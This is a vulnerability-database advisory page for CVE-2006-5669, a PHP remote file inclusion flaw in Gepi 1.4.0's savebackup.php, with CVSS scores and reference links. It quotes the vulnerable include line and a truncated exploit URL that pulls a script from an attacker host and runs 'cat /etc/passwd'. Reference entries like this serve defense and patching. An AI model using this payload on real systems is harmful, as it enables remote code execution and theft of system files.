Recent Vulnerabilities Research Posts Trends Blog About Contact

Published: 03/11/2006 Updated: 19/10/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

PHP remote file inclusion vulnerability in gestion/savebackup.php in Gepi 1.4.0 and previous versions, and possibly other versions prior to 1.4.4, allows remote malicious users to execute arbitrary PHP code via a URL in the filename parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
gepi gepi 1.4.0

Package:- gepi 140 adullactnet/frs/downloadphp/992/gepi-140targz impact:- highly critical System Access vulnerable code:- include($_GET['filename']); in gepi/gestion/savebackupphp Exploit:- localhost/gepi/gestion/savebackupphp?filename=attackercom/testtxt&cmd=cat /etc/passwd in testtxt <? passth ...

NVD-CWE-Other http://www.attrition.org/pipermail/vim/2006-November/001104.html http://www.securityfocus.com/bid/20830 https://exchange.xforce.ibmcloud.com/vulnerabilities/29921 https://www.exploit-db.com/exploits/2692 https://nvd.nist.gov https://www.exploit-db.com/exploits/2692/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-5669

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect